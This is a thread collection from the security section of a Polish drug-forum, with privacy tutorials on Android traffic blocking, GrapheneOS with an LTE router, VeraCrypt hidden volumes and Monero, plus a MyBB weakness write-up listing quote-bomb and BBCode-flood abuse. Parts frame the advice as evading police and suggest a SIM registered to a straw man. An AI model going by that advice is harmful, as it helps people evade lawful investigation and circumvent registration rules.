Dopal.org - Forum Dyskusyjne o Używkach i RC - Bezpieczeństwo w sieci

Android - Co wysyła w świat Twój smartfon?

Sat, 04 Apr 2026 18:30:50 +0000

Chciałem podzielić się kilkoma informacjami dla osób, które zastanawiają się, z czym tak naprawdę łączy się ich smartfon.

Większość osób nie zdaje sobie sprawy ile połączeń sieciowych wykonują aplikacje w tle, często bez żadnej widocznej aktywności ze strony użytkownika albo wręcz teoretycznie rozumianej potrzeby.

Zanim zaczniesz cokolwiek blokować, warto najpierw zobaczyć, co się dzieje. Do tego polecam aplikację PCAPdroid (dostępna na F-Droid i Google Play). Pozwala ona monitorować ruch sieciowy bez roota.

Widać w niej każde połączenie: z jaką domeną, na jaki port, ile danych przesłała dana aplikacja.

Co możesz zobaczyć:

Aplikacje łączące się z serwerami reklamowymi
Telemetria wysyłana do serwerów producenta smartfona
Połączenia komunikatorów i przeglądarek w tle
Nieznane hosty przy aplikacjach, które teoretycznie nie powinny mieć dostępu do transmisji

Wystarczy uruchomić przechwytywanie, poużywać telefonu przez kilka minut i przejrzeć listę połączeń.

U mnie aplikacje, które miały wyłączoną opcję transmisji danych w ustawieniach i tak łączyły się z serwerami producenta mojego smartfona pomimo braku takiej potrzeby.

Zaskoczenie tym faktem było jednym z powodów chęci podzielenia się tą - wydawało by się podstawową wiedzą związaną z używaniem przedstawianych przeze mnie aplikacji.

Źródła obrazków: https://github.com/emanuele-f/PCAPdroid

Gdy wiesz już, co się łączy, możesz to kontrolować. Do tego służy NetGuard - firewall działający bez roota, który tworzy lokalną sieć VPN i przez nią filtruje ruch aplikacji.

Podstawowe funkcje:

Blokowanie dostępu do internetu osobno dla Wi-Fi i dla danych mobilnych
Lista wszystkich aplikacji z możliwością włączenia/wyłączenia dostępu

Oprócz tego aplikacja oferuje pełno innych ciekawych opcji. Można również tutaj badać dzienniki połączeń z siecią, ale ja rozdzieliłem to na dwie aplikacje osobno ponieważ w NetGuard jest to funkcja premium - dodatkowo płatna.

PCAPdroid - żeby zobaczyć połączenia

NetGuard - żeby blokować połączenia

Źródło obrazka: https://netguard.me

Polecam pobawić się i sprawdzić, ale nie popadać też w paranoję - co może się zdarzyć ze względu na to że Android robi w tle mnóstwo requestów których nawet sobie nie wyobrażaliście, wyglądających wręcz jak bezsensowne.

Niemniej jednak tym bardziej myślę że warto. Zazwyczaj mamy podłączony telefon do sieci non stop a niekoniecznie chcemy robić za - jak to mawiał klasyk - radiostacje.

Blokuj wszystko, co nie potrzebuje internetu do działania - kalkulatory, latarki, zegary, klawiatury, galerie, gry offline i inne dziadostwa zwłaszcza te które przykuły twoją podejrzliwość w kwestii sensowności. Na przykład przeglądarka plików gdzie nie używasz chmury łączy się kiedy ją odpalasz.

Chętnie odpowiem na pytania i poczytam o doświadczeniach innych userów w tym temacie. Na pewno są jakieś lepsze rozwiązania bardziej trwałe, uniwersalne. Myślę że temat jest godzien dobrej dyskusji.

Bezpieczny email poza protonem

Tue, 17 Mar 2026 15:17:35 +0000

Co sądzicie o tej stronie?

Kod:
https://mailum.com

Według mnie duzo lepszy od protona.
zero logow, zero plikow cookie i itp.
Polecam

• -» Analiza ruchu przez obrazki, MyCode -(BBCode)

Tue, 10 Mar 2026 01:08:22 +0000

🔹 Analiza bezpieczeństwa MyBB

1. Wprowadzenie
MyBB to popularne oprogramowanie forum, które pozwala wstawiać posty przy użyciu BBCode.

Tag -[-IMG] czyli obrazek wklejony i wyświetlany gdziekolwiek→ przeglądarka wysyła GET do serwera zewnętrznego.

›. Serwer może logować IP, czas, user-agent i referer.

Cytat:GET /picture.png HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Referer: https://forum.com/thread/123

Każdy obrazek jest więc zewnętrznym requestem, który może służyć do śledzenia aktywności użytkowników.

3. Typowe nadużycia
• Content Switch Attack – zmiana obrazu po publikacji np. w poradniku.
• External Resource Manipulation – podmiana obrazów w postach lub shoutboxie.
• Mutable external content – dynamiczny content, np. phishing wizualny lub malware.

🗼 » Przykłady scenariuszy
- Podmiana treści posta poprzez zmianę obrazu.
- Socjotechnika: fałszywe komunikaty typu "twoje konto wygasło".
- Phishing wizualny i QR code malware.
- Tracking użytkowników: IP, referer, user-agent.
- Pixel tracking: 1×1 obrazki.
- Fingerprinting przeglądarek.
- Wymuszone zapytania HTTP do serwera atakującego.
- Podmiana obrazów na treści nielegalne.

4. Problemy techniczne MyBB
• SQL Error 1366 – baza ustawiona na utf8, a wstawione emoji (4 bajty) np. 🎖.

Cytat:SQL Error: 1366 - Incorrect string value '\xF0\x9F\x8E\x96...' for column 'subject'

• Quote bomb – zbyt głęboko zagnieżdżone [quote] spowalnia parser i obciąża CPU.
• Duże sygnatury / shoutbox – setki requestów HTTP dla obrazków.
• Automatyczne embedowanie linków – linki do obrazów mogą omijać limit [img].
• BBCode flood – ogromne posty z dziesiątkami zagnieżdżonych [quote] i [img] mogą obciążyć forum.

5. Limity i zabezpieczenia
• Limit obrazów w poście: 5–15
• Limit głębokości [quote]: max quote depth = 10
• Limit sygnatur: 1–2 obrazki
• Image proxy / cache
• Whitelist hostów
• Wyłączenie HTML dla użytkowników
• Blokowanie dużych GIF
• Logowanie błędów zamiast pokazywania szczegółowych zapytań SQL

· Limit załączników został poprawiony ale też można było się nadziać na duże bomby plików, gdyby ktoś wykorzystał.

6. Rekomendacje dla technika
• Zmiana bazy na utf8mb4 aby obsłużyć emoji
• Włączenie logów zamiast pokazywania błędów SQL
• Ograniczenie liczby obrazów i głębokości cytatów
• Cache i proxy dla zewnętrznych obrazów
• Archiwizacja obrazów wewnętrznych zamiast polegania na linkach zewnętrznych

7. Podsumowanie
Problemy z [-img], [-quote] i emoji w MyBB nie są klasycznymi exploitami, ale mogą:

- ujawniać strukturę bazy SQL
- spowalniać forum
- umożliwiać śledzenie użytkowników
- służyć do manipulacji treścią

Zastosowanie powyższych limitów i pluginów znacząco poprawia bezpieczeństwo i wydajność forum.

Dużo już zostało poprawione po zgłoszeniach dlatego można zamieścić to w poście i nie wygląda to jako poradnik

Właśnie teraz wypierdziela mysql'a na stronie głównej.
Dodaje post żeby technik mógł sprawdzić po godzinie logi później.

[/size]

oho to ładnie się porobiło, post mi edytowalo, ucięło i tryb widoku w edycji.

Kopie se niżej dodałem...

Kod PHP:
🔹 Analiza bezpieczeństwa MyBB

1. Wprowadzenie
MyBB to popularne oprogramowanie forum, które pozwala wstawiać posty przy użyciu BBCode. 
   
Tag -[-IMG] czyli obrazek wklejony i wyświetlany gdziekolwiek→ przeglądarka wysyła GET do serwera zewnętrznego. 

  ›. Serwer może logować IP, czas, user-agent i referer.
Cytat:
GET /picture.png HTTP/1.1 
Host: example.com 
User-Agent: Mozilla/5.0 
Referer: https://forum.com/thread/123
Każdy obrazek jest więc zewnętrznym requestem, który może służyć do śledzenia aktywności użytkowników.

3. Typowe nadużycia
• Content Switch Attack – zmiana obrazu po publikacji np. w poradniku. 
• External Resource Manipulation – podmiana obrazów w postach lub shoutboxie. 
• Mutable external content – dynamiczny content, np. phishing wizualny lub malware.

🗼 » Przykłady scenariuszy
- Podmiana treści posta poprzez zmianę obrazu. 
- Socjotechnika: fałszywe komunikaty typu "twoje konto wygasło". 
- Phishing wizualny i QR code malware. 
- Tracking użytkowników: IP, referer, user-agent. 
- Pixel tracking: 1×1 obrazki. 
- Fingerprinting przeglądarek. 
- Wymuszone zapytania HTTP do serwera atakującego. 
- Podmiana obrazów na treści nielegalne.

4. Problemy techniczne MyBB
• SQL Error 1366 – baza ustawiona na utf8, a wstawione emoji (4 bajty) np. 🎖. 
Cytat:
SQL Error: 1366 - Incorrect string value '\xF0\x9F\x8E\x96...' for column 'subject'
• Quote bomb – zbyt głęboko zagnieżdżone [quote] spowalnia parser i obciąża CPU. 
• Duże sygnatury / shoutbox – setki requestów HTTP dla obrazków. 
• Automatyczne embedowanie linków – linki do obrazów mogą omijać limit [img]. 
• BBCode flood – ogromne posty z dziesiątkami zagnieżdżonych [quote] i [img] mogą obciążyć forum.

5. Limity i zabezpieczenia
• Limit obrazów w poście: 5–15 
• Limit głębokości [quote]: max quote depth = 10 
• Limit sygnatur: 1–2 obrazki 
• Image proxy / cache 
• Whitelist hostów 
• Wyłączenie HTML dla użytkowników 
• Blokowanie dużych GIF 
• Logowanie błędów zamiast pokazywania szczegółowych zapytań SQL

· Limit załączników został poprawiony ale też można było się nadziać na duże bomby plików, gdyby ktoś wykorzystał.

6. Rekomendacje dla technika
• Zmiana bazy na utf8mb4 aby obsłużyć emoji 
• Włączenie logów zamiast pokazywania błędów SQL 
• Ograniczenie liczby obrazów i głębokości cytatów 
• Cache i proxy dla zewnętrznych obrazów 
• Archiwizacja obrazów wewnętrznych zamiast polegania na linkach zewnętrznych 

7. Podsumowanie
Problemy z [-img], [-quote] i emoji w MyBB nie są klasycznymi exploitami, ale mogą: 
- ujawniać strukturę bazy SQL 
- spowalniać forum 
- umożliwiać śledzenie użytkowników 
- służyć do manipulacji treścią 

Zastosowanie powyższych limitów i pluginów znacząco poprawia bezpieczeństwo i wydajność forum.
Dużo już zostało poprawione po zgłoszeniach dlatego można zamieścić to w poście i nie wygląda to jako poradnik. 

Poprawie i wkleje w

Kod PHP:
Code 

zeby edytować i oznacze Moderator'a ale tera to nie mam siły na to.

[TUTORIAL] Prywatność totalna: GrapheneOS + Router LTE. Jak stać się „niewidzialnym”?

Sat, 17 Jan 2026 07:16:06 +0000

Witam! W tym tutorialu przyjrzymy się najbardziej bezpiecznej opcji, jeśli chodzi o smartfon – przynajmniej według mnie.
Na wstępie zaznaczę: bez wydania konkretnej kupy Gelda czy też PLN-ów się nie obejdzie. Nasz setup będzie pozbawiony funkcji dzwonienia na numer telefonu, ponieważ w samym smartfonie nigdy nie wyląduje karta SIM.
Połowa osób pewnie właśnie opluła ekrany, łapiąc się za głowę i pytając w myślach:

"Co Ty, Hoxed, pierdolisz? Mam zapierdalać po mieście i szukać darmowych hotspotów, żeby odpisać na wiadomość?"

💡 Na czym polega plan?

Cały misterny plan opiera się na tym, aby używać internetu z mobilnego routera na karty SIM (i to nie byle jakiego). W smartfonie z zainstalowanym systemem GrapheneOS nigdy nie używamy karty SIM, wyłączamy całkowicie usługi GPS i trzymamy się twardych zasad BHP pracy z takim urządzeniem.

📱 Czym w ogóle jest GrapheneOS?

W największym skrócie: to system operacyjny bazujący na AOSP (Android Open Source Project). Jest to najbezpieczniejszy i najbardziej prywatny system mobilny dostępny dla zwykłego użytkownika.
To nie jest "kolejny Custom ROM" do zabawy. To profesjonalny projekt stawiający na security hardening (utwardzanie bezpieczeństwa) i privacy by design. Nawet Edward Snowden przyznał, że sam z niego korzysta.

🛡️ Najważniejsze funkcje (Killer Features):

• Całkowity brak Google (De-Googled): System domyślnie nie ma żadnych usług Google. Twój telefon nie wysyła w tle danych o Twojej lokalizacji czy aktywności na serwery korporacji.
• Sandboxed Google Play: To "game changer". Jeśli potrzebujesz jakiejś apki Google (np. Mapy), możesz je zainstalować jako zwykłe aplikacje. Działają one w izolacji (piaskownicy) i nie mają dostępu do reszty telefonu.
• Bezpieczeństwo: Utwardzony kernel, lepsze zarządzanie pamięcią, szybkie łatki bezpieczeństwa (często szybciej niż na stockowym Androidzie!).
• Przeglądarka Vanadium: Specjalnie wzmocniona wersja Chromium, domyślna w systemie.

📱 Na czym to działa?

Paradoksalnie GrapheneOS działa oficjalnie tylko na telefonach Google Pixel. Dlaczego? Bo mają najlepszy chip bezpieczeństwa (Titan M2) i pozwalają na ponowne zablokowanie bootloadera przy niestandardowym kluczu (Verified Boot). Dzięki temu nikt nie wgra Wam złośliwego softu bez Waszej wiedzy.

Lista wspieranych urządzeń:

• Pixel 10 Pro Fold / 10 Pro XL / 10 Pro / 10

• Pixel 9a / 9 Pro Fold / 9 Pro XL / 9 Pro / 9

• Pixel 8a / 8 Pro / 8 / Fold / Tablet

• Pixel 7a / 7 Pro / 7

• Pixel 6a / 6 Pro / 6

• (Pełna lista: grapheneos.org/faq#device-support)

📶 Wybór routera – Nasze centrum łączności

Jeśli telefon ma być w pełni bezpieczny, musimy ogarnąć drugie urządzenie (router). Osobiście uważam, że GrapheneOS na co dzień jako jedyny telefon może doprowadzić do szewskiej pasji, ale do bezpiecznych operacji jest zajebisty.
Samą instalację systemu pominę, bo łatwo ją znaleźć w sieci: Instrukcja instalacji. Skupmy się na routerze.

Opcja „Budget”:

Jeśli milicja nie ma na Ciebie takiego parcia, jak przeciętny użytkownik tego forum na metaklefedron (XD), możesz kupić najzwyklejszy mobilny router Alcatela albo inne gówno z Temu i puszczać ruch przez aplikację Orbot na telefonie.

Opcja „PRO / BOSS”:

1. GL.iNet GL-X3000 (Spitz AX) – Bestia wydajności (5G)

To jest "starszy brat" modelu Mudi. Jeśli masz budżet i zależy Ci na prędkości, to jest topowy wybór.
• Zalety: Obsługuje 5G oraz Wi-Fi 6. Ma bardzo mocny procesor, dzięki czemu obsługa protokołu WireGuard osiąga prędkości nawet do 150-200 Mbps (dla porównania, zwykłe routery dławią się przy 20 Mbps).
• VPN: Natywna obsługa OpenVPN i WireGuard. Fizyczny przełącznik z boku obudowy do włączania VPN.
• Wada: Nie ma wbudowanej baterii (musi być podłączony do prądu lub powerbanka przez USB-C). Jest też dość duży i drogi (ok. 2000+ zł).

2. Teltonika RUT241 / RUT950 – Pancerne rozwiązanie przemysłowe

Jeśli bardziej niż na prędkości zależy Ci na tym, żeby sprzęt działał w każdych warunkach (np. wrzucasz go do plecaka, auta, czy domku letniskowego i zapominasz), celuj w litewską markę Teltonika.
• Zalety: Sprzęt klasy przemysłowej. Metalowa obudowa, niesamowita stabilność (system RutOS bazujący na OpenWRT). Bardzo rozbudowane opcje konfiguracji VPN (OpenVPN, IPsec, WireGuard, ZeroTier).
• Wady: Interfejs jest trudniejszy (mniej "user friendly" niż w GL.iNet). Procesory są nastawione na niezawodność, a nie wydajność – przy włączonym VPN prędkość spadnie zauważalnie (często poniżej 20-30 Mbps). Brak wbudowanej baterii.
• Cena: Ok. 700-900 zł.

3. Cudy LT500 / LT18 – Budżetowa alternatywa

Coraz popularniejsza marka, która w przeciwieństwie do TP-Linka, wpycha obsługę VPN do domowych routerów LTE.
• Zalety: Cena. Model LT500 kupisz za ok. 300-400 zł. Obsługuje klientów PPTP / L2TP / OpenVPN / WireGuard. To najtańszy sposób na router LTE z VPN "prosto z pudełka".
• Wady: Jakość wykonania jest "plastikowa". Oprogramowanie jest proste, ale nie daje takiej kontroli jak OpenWRT w GL.iNet czy Teltonice. Prędkości VPN będą przeciętne.

💡 Dlaczego protokół ma znaczenie? (Ważna uwaga techniczna)

Kupując router do tego zestawu, musisz używać protokołu WireGuard, a nie OpenVPN.

• OpenVPN: Jest stary i "ciężki". Mobilne routery mają słabe procesory. Na OpenVPN wyciągniesz max 10-15 Mbps prędkości.
• WireGuard: Jest nowoczesny i lekki. Na tym samym routerze wyciągniesz 50-80 Mbps (lub więcej na modelu Spitz AX).

Oczywiście możemy szukac alternatyw dla tych propozycji. Bo sa duzo tańsze modele, lub i takie ktore nie maja funkcji przepuszczenia ruchu siecii przez VPN-a domyślnie ale da sie zmienić ich oprogramowanie.

🏆 Mój wybór: GL.iNet GL-E750 (Mudi) v2

To jest przenośny router 4G/LTE z wbudowaną baterią (7000 mAh), który został stworzony z myślą o prywatności.
Dlaczego to idealny partner dla GrapheneOS?
• Natywna obsługa Tor: W panelu administratora masz po prostu suwak/przycisk do włączenia Tora. Nie musisz nic hackować ani wpisywać komend w terminalu. Cały ruch z urządzeń podłączonych do Wi-Fi idzie przez sieć cebulową.
• OpenSource: Działa na zmodyfikowanym OpenWRT. To oznacza, że nie ma tam (teoretycznie) tylnych furtek, jakie mogą mieć routery Huawei czy ZTE.
• Fizyczny przełącznik (Kill Switch): Z boku obudowy masz przełącznik, który możesz zaprogramować. Np. pstryknięcie włącza Tora lub VPN.
• Anonimizacja sprzętowa: Twój operator sieci (Orange, Play, T-Mobile itp.) widzi IMEI routera, a nie Twojego Pixela. GrapheneOS domyślnie losuje adres MAC przy łączeniu z Wi-Fi, więc jesteś bardzo trudny do śledzenia (router robi za tarczę).
• DNS over TLS (Cloudflare/NextDNS): Możesz zaszyfrować zapytania DNS bezpośrednio na routerze.
Alternatywa (nieco tańsza/inna budowa):
• GL.iNet GL-XE300 (Puli): Też ma baterię i LTE, ale wygląda bardziej jak klasyczny router przemysłowy (ma anteny na zewnątrz). Działa na tej samej zasadzie.

⚠️ O czym musisz pamiętać (Ważne!):

• Zasada "Nie krzyżuj strumieni": Jeśli włączysz Tor na routerze, NIE włączaj już Orbot/Tor Browser na telefonie z GrapheneOS.
• Tor over Tor (tunelowanie Tora w Torze) nie zwiększa bezpieczeństwa, a drastycznie niszczy prędkość i często uniemożliwia połączenie (węzły wyjściowe mogą odrzucać takie pakiety).
• Prędkość: Cały ruch przez Tor będzie wolny. Streaming w 4K czy pobieranie dużych plików będzie bolesne. To rozwiązanie do komunikacji tekstowej, maili i lekkiego przeglądania.
• Captchas: Przygotuj się na to, że 90% stron będzie kazało Ci klikać w pasy dla pieszych i hydranty. Ruch z węzłów wyjściowych Tora jest często flagowany jako "podejrzany".
• Karta SIM: Najlepiej użyj pre-paida kupionego za gotówkę i zarejestrowanego (w Polsce niestety obowiązek) na "słupa" lub w punkcie, który nie weryfikuje zbyt wnikliwie, aby zachować pełną anonimowość.
•
Podsumowując: Kup GL.iNet Mudi (GL-E750). To drogi sprzęt (ok. 800-1000 zł), ale do Twoich zastosowań nie ma lepszej, gotowej alternatywy.

⚠️ Kluczowe zasady BHP (Jak nie dać się dojechać)

Sam sprzęt to nie wszystko. Musisz wiedzieć, jak się z nim obchodzić:
• Izolacja przy starcie: Gdy dostaniesz Pixela i router, nie włączaj ich w domu. Nie łącz się z domowym Wi-Fi. Twój prywatny telefon ma być wyłączony (dla pewności owiń go folią aluminiową).
• Pierwsza konfiguracja: GrapheneOS i router konfiguruj „na mieście” lub na osobnej karcie SIM. Po wszystkim wyłącz sprzęt, wyjmij kartę SIM, owiń wszystko folią i dopiero wtedy odpal prywatny telefon.
• Zasada dwóch urządzeń: Nigdy, przenigdy nie miej włączonego routera i telefonu z GrapheneOS obok swojego prywatnego smartfona z Twoją prawdziwą kartą SIM!
• DLACZEGO? Jeśli oba urządzenia zalogują się do tego samego BTS-a w tym samym czasie, jesteś do namierzenia w minutę. Milicja powiąże Twój prywatny numer z Twoim „anonimowym” setupem.
• Higiena danych:
• Nigdy nie loguj się na prywatne socjale (FB, IG, itp.).
• Nie korzystaj z bankowości na swoje prawdziwe dane.
• Zmieniaj karty SIM w routerze jak najczęściej (kupuj pre-paidy za gotówkę).
• Nigdy nie podawaj nikomu numeru karty, która siedzi w routerze.
• Nigdy nie zabieraj obu telefonów (prywatnego i bezpiecznego) w to samo miejsce w tym samym czasie.
Ten config nie sprawi, że magicznie staniesz się nieuchwytny dla służb specjalnych, ale pomoże Ci stać się niewidzialnym w terenie dla standardowej analityki i "smutnych panów".

Czy warto? niech sobie kazdy odpowie sam.
Jest to oczywiscie tylko propozycja oraz przedstawienie metody na anonimizacje smartfona.
Zachecam do dyskusji w komentarzach

Klawiatura na telefon

Mon, 11 Aug 2025 13:23:37 +0000

Poleci ktoś bezpieczną klawiaturę na urządzenie mobilne, która nie zapisuje tego, co się na niej pisze?
Pozdro

Ukrywanie zdjęć

Thu, 07 Aug 2025 07:13:05 +0000

Ciekawostka. Mozna skitrać pościągane pornosy przed kobietą, zdjęcia kochanek czy ważne zdjęcia niebezpiecznych dopalaczy

Video jak to działa:

Modyfikacja telefonu z Androidem przez adb

Mon, 28 Jul 2025 16:01:00 +0000

Ktoś doświadczony i moglby dać jakieś przydatne komendy/modyfikacje i jakie pliki poinstalować/odinstalować żeby taki telefon był bezpieczniejszy i teudniejszy do namierzenia (np przez GPS) i ew. czego szukać lub na co zwracać uwagę po logach żeby ocenić czy telefon ten jest obserwowany?

VPNy - który najlepszy

Thu, 17 Jul 2025 19:40:22 +0000

mullvad vpn to wiadomo że git.
proton vpn - cos sie ktos wypowie?

i czy slyszal ktos o vp.net? chwalą sie że mają taką zajebistą technologie, że doslownei niemożliwe jest podejrzenie tego co przeglądasz, bo normalnie inne firmy od vpnów mają oczywiscie taką możliwość ale obiecują że nie beda patrzeć ani udostepniać, a w vp.net podobno zrobili to tak że jest to niemożliwe.

widziałem ich reklamy u jednego goscia na youtubie którego oglądam, takiego dość rozsadnego goscia co z sensem gada i mnie ten vp.net zainteresowal

(2) Szyfrowanie danych - Ukryty wolumin VeraCrypt

Sun, 29 Jun 2025 11:46:42 +0000

Jest to part 2 tutoriala VeraCrypt, wcześniej tłumaczyłem jak zrobić prosty wolumin. Tutaj robimy ukryty. Jeśli nie rozumiesz różnicy - dostrzeżesz ją jak zapoznasz się z tym szybkim opisem.

Dla kogo: dla tych, którzy chcą mieć plan B przy "dyskretnych sytuacjach"

🤫 Co to robi?

Masz dwa woluminy w jednym pliku: zewnętrzny (widoczny) i ukryty (niewidoczny). Jak podasz jedno hasło – montuje zewnętrzny. Jak drugie – montuje ukryty.

🪜 Kroki:

Otwórz VeraCrypt - stąd pobierzesz: https://veracrypt.io/en/Downloads.html

Create Volume Create an encrypted file container

Zaznacz: Hidden VeraCrypt volume

Zdefiniuj:
Plik dla woluminu (ja zapisałem na dysku zewnętrznym plik hidden-dopal.org)

Next > AES jest wystarczający

Określ rozmiar zewnętrznego woluminu - pamiętaj, że maksymalnie tyle będziesz mógł użyć w docelowym, ukrytym woluminie

Ustal hasło dla zewnętrznego woluminu

Wybierz najlepiej FAT

Teraz nadupcaj myszą - tak randomizujesz szyfrowanie

Wolumin zewnętrzny gotowy. Kliknij Next > aby przejść do konfiguracji ukrytego:

Next >

Tutaj też możesz wybrać szyfrowanie ale AES SHA-512 jest dość mocny, więc Next >

Tutaj ustalasz wielkość woluminu ukrytego, tak jak pisałem maksymalnie to niespełna tyle co ustawiłeś wolumin zewnętrzny

Hasło ukrytego woluminu

Znowu FAT, Next >

Masz informację, że się udało i o ostrzeżenie o montowaniu zewnętrznego woluminu (o tym za chwilę)

W sumie to już tutaj (montowanie):

Wybierasz plik

Podajesz hasło - ale tutaj to jest opcja wtedy kiedy ktoś Ci stoi za plecami i każe odszyfrować dysk... Tak się nie robi jak jesteś bezpieczny...

No ale zamontował - jak widzisz "Type" jest "Normal" - i to jest dobre bo osoba, która stoi Ci za plecami myśli, że to normalny wolumin i właśnie go mu odszyfrowałeś. Ale jak już pisałem jak jesteś bezpieczny to rób inaczej. Mianowicie:

Klikasz "Options >", zaznaczasz checkbox "Protect hidden volume....", podajesz hasło do ukrytego woluminu, podajesz do zewnętrznego i dopiero wtedy montujesz.

Tutaj masz dupne info, że dobrze robią ogólnie i tak trzeba robić jak chcesz zapisać jakieś dane na tym zewnętrznym woluminie. Inaczej po prostu możesz uszkodzić dane na tym ukrytym.

Jak widzisz "Type" jawnie mówi, że to "Outer"

A teraz serio - czyli montujesz ukryty wolumin, którego hasła nie ujawnisz

Zamontował się jako "Hidden"

Czaisz?

Gdy ktoś wymusi na Tobie hasło to podajesz "niby" - wolumin montuje się jakby by zwykły a "serio" zaszyfrowane dane są bezpieczne.

(1) Szyfrowanie danych - Prosty wolumin VeraCrypt

Sat, 28 Jun 2025 08:02:00 +0000

Dla kogo: dla każdego, kto chce mieć zaszyfrowany plik do trzymania danych

🔧 Co to robi?

Tworzysz plik .hc (kontener), który montujesz jak dysk — i wrzucasz do niego co chcesz. Dane są zaszyfrowane i chronione hasłem. Dostęp do swoich danych możesz uzyskać tylko przy ponownym użyciu VeraCrypt i oczywiście tylko ze swoim hasłem.

🪜 Kroki:

Otwórz VeraCrypt - stąd pobierzesz: https://veracrypt.io/en/Downloads.html

Kliknij "Create Volume"

Wybierz "Create an encrypted file container"

Wybierz "Standard VeraCrypt volume"

Jeśli chcesz utworzyć ukryty wolumin wybierz "Hidden VeraCrypt volume" i sprawdź tutorial (2), który znajdziesz też w tym dziale (wkrótce).

Wybierz gdzie zapisać plik kontenera (u mnie jest to dysk zewnętrzny, plik nazwałem dopal.org)

Wybierz algorytm szyfrowania (domyślnie AES wystarczy)

Określ rozmiar (np. 1 GB)

Ustaw hasło (zrób to sensownie!)

Możesz dostać taki warning jak ustawisz za słabe hasło. Jak jesteś z tym ok to dawaj "Yes" ale jednak dobrze się zastanowić nad jakimś lepszym hasłem. Polecam używać z jakiegoś menadżera haseł, który zaproponuje Ci bezpieczne hasło.

Format systemu plików, najlepiej FAT (na macOS: exFAT lub FAT, APFS/HFS+ nie działa!)

Kliknij "Format" i napierdalaj myszą - w ten sposób randomizuje się szyfrowanie Twojego woluminu.

Sukces!

Klikaj "Exit" albo "Next" jeśli chcesz utworzyć kolejny szyfrowany wolumin.

Po utworzeniu możesz:

W VeraCrypt kliknąć "Select File" → wybierz swój .hc

Wybierz slot , obojętne który.

Kliknij "Mount", wpisz hasło

Poczekaj chwilę na zamontowanie

Voila!

Gotowe – działa jak dysk

Krypto płatności, czy da się bezpieczniej?

Fri, 23 May 2025 20:49:01 +0000

Żyjemy w czasach, gdzie każdy ruch Twoich cyfrowych pieniędzy zostawia ślad – a większość ludzi nawet nie zdaje sobie z tego sprawy. Korzystając z giełd KYC takich jak Binance, podpisujesz się pod każdą transakcją. Nie dosłownie, ale metadane nie kłamią.
Chcesz zyskać prywatność? Zrobić to legalnie, ale świadomie? Dobrze trafiłeś. Pokażę Ci, jak krok po kroku uwolnić swoje kryptowaluty z łańcucha powiązań.
Etap 1: Przejście przez most
Założenie wstępne: Masz już środki na swoim koncie Binance.
Plan: Wymienimy je na Monero (XMR) – kryptowalutę stworzoną z myślą o prywatności – za pomocą FixedFloat: zdecentralizowanej wymieniarki bez rejestracji.
Instrukcja:

Wejdź na stronę: https://www.fixedfloat.com (nie rejestruj się nie ma potrzeby)
Ustaw wymianę:
- Z: USDT (lub innej kryptowaluty, którą masz na Binance)
- Na: XMR
Wprowadź kwotę oraz adres swojego portfela Monero.
FixedFloat wygeneruje Ci adres USDT, na który musisz wysłać środki.
Przejdź do Binance → „Wypłata krypto” → wybierz USDT → wklej adres z FixedFloat → zaznacz, że „wysyłasz do siebie”.
Po kilku minutach Twoje środki pojawią się na portfelu Monero – już bez odcisku palca z Binance.

Etap 2: Monero – mistrz kamuflażu
Dlaczego Monero?
Monero to kryptowaluta stworzona z myślą o prywatności. W przeciwieństwie do Bitcoina, wszystkie transakcje są domyślnie ukryte – kwoty, adresy, odbiorcy, wszystko.
Portfel Monero GUI – dwie opcje:
Kiedy pobierzesz oficjalny portfel Monero GUI z https://www.getmonero.org, masz dwie opcje:

Pełny węzeł (Full node) – ściągasz cały blockchain (~150 GB). Maksymalna prywatność i niezależność, ale potrzebujesz sporo miejsca i czasu.
Zdalny węzeł (Remote node) – nie pobierasz blockchaina, portfel łączy się z istniejącym węzłem Monero online. To szybsze, lżejsze i wygodniejsze, choć teoretycznie nieco mniej prywatne (bo zewnętrzny węzeł widzi czas Twojego zapytania).

Możesz skorzystać z oficjalnych publicznych node’ów lub dodać własny, jeśli masz zaufanie.
Etap 3: Gotowe. I co dalej?
Masz Monero. Masz spokój. Teraz możesz:

płacić bez śladów
trzymać środki bez obaw, że ktoś je analizuje,
wymieniać je później z powrotem na inne krypto, jeśli zechcesz.

Uwaga końcowa – od Heisenberga
Prywatność to nie przestępstwo. To Twoje prawo.

PS. nie przelewajcie dużych kwot naraz (grozi to blokadą na binance) używajcie VPN. o VPN'ach które są dobre a które sprzedajne będzie niebawem kolejny POST.

Uniemożliwienie inwigilacji poszczególnym programom.

Thu, 27 Mar 2025 15:41:48 +0000

Jak pewnie wiecie, bądź nie wiecie - większość programów codziennego użytku na waszym komputerze, zbiera o was pełny pakiet informacji na podstawie "ulepszania doświadczeń użytkownika".

Powiem o tym na podstawie Microsoft Word, bo jest duża szansa, że ktoś używa właśnie jego do pisania i edycji niektórych obszerniejszych wątków.

Co zbiera Word?

OneDrive i SharePoint – Jeśli zapisujecie pliki w chmurze, ich zawartość jest synchronizowana.
Autokorekta i sugestie pisania – Może przesyłać dane do Microsoftu w celu ulepszenia funkcji edytorskich.
Telemetria (Diagnostyka) – Microsoft zbiera dane o użytkowaniu aplikacji w celu poprawy jej działania.
Inteligentne usługi Office (np. tłumaczenie, edytor, Copilot) – Przetwarzają tekst w chmurze.
Historia wersji dokumentów – Jeśli piszecie w trybie online, wcześniejsze wersje pliku mogą być przechowywane na serwerach Microsoftu.

Brzmi nieszkodliwie, wszak to "ulepszanie doświadczenia użytkownika" jak sama nazwa i opis wskazuje, ale:

Ulepszanie doświadczenia użytkownika to często tylko ładna nazwa dla zbierania danych. Microsoft (i nie tylko on) przesyła mnóstwo informacji pod pretekstem poprawy jakości usług, ale w rzeczywistości często chodzi o analizę zachowań użytkowników, rozwój AI i personalizację reklam.

Oczywiście większość z tych opcji możecie wyłączyć w samych ustawieniach Worda, ale ja wolę wiarygodniejsze metody.
Bo robiąc co, bylibyście bardziej pewni, że nikt was nie podgląda?
Wyłączając kamerkę od laptopa w ustawieniach, czy fizycznie przecinając jej przewód?

Najbezpieczniej czuję się, blokując dostęp do internetu (a tym samym możliwość przekazywania danych) programowi, którego zamierzam używać.
Blokada poprzez firewalla na przykładzie Worda na systemie Windows:

- Otwieramy Panel sterowania > Zapora systemu Windows Defender
- Po lewej stronie Ustawienia zaawansowane
- W sekcji Reguły wychodzące klikamy Nowa reguła
- Wybieramy Program i Dalej
- W sekcji Ścieżka programu wskazujemy plik WINWORD.EXE (albo dowolny inny). Domyślna ścieżka to np. C:\Program Files\Microsoft Office\root\OfficeXX\WINWORD.EXE
- Klikamy Dalej > Blokuj połączenie i kontynuujemy aż do zakończenia kreatora

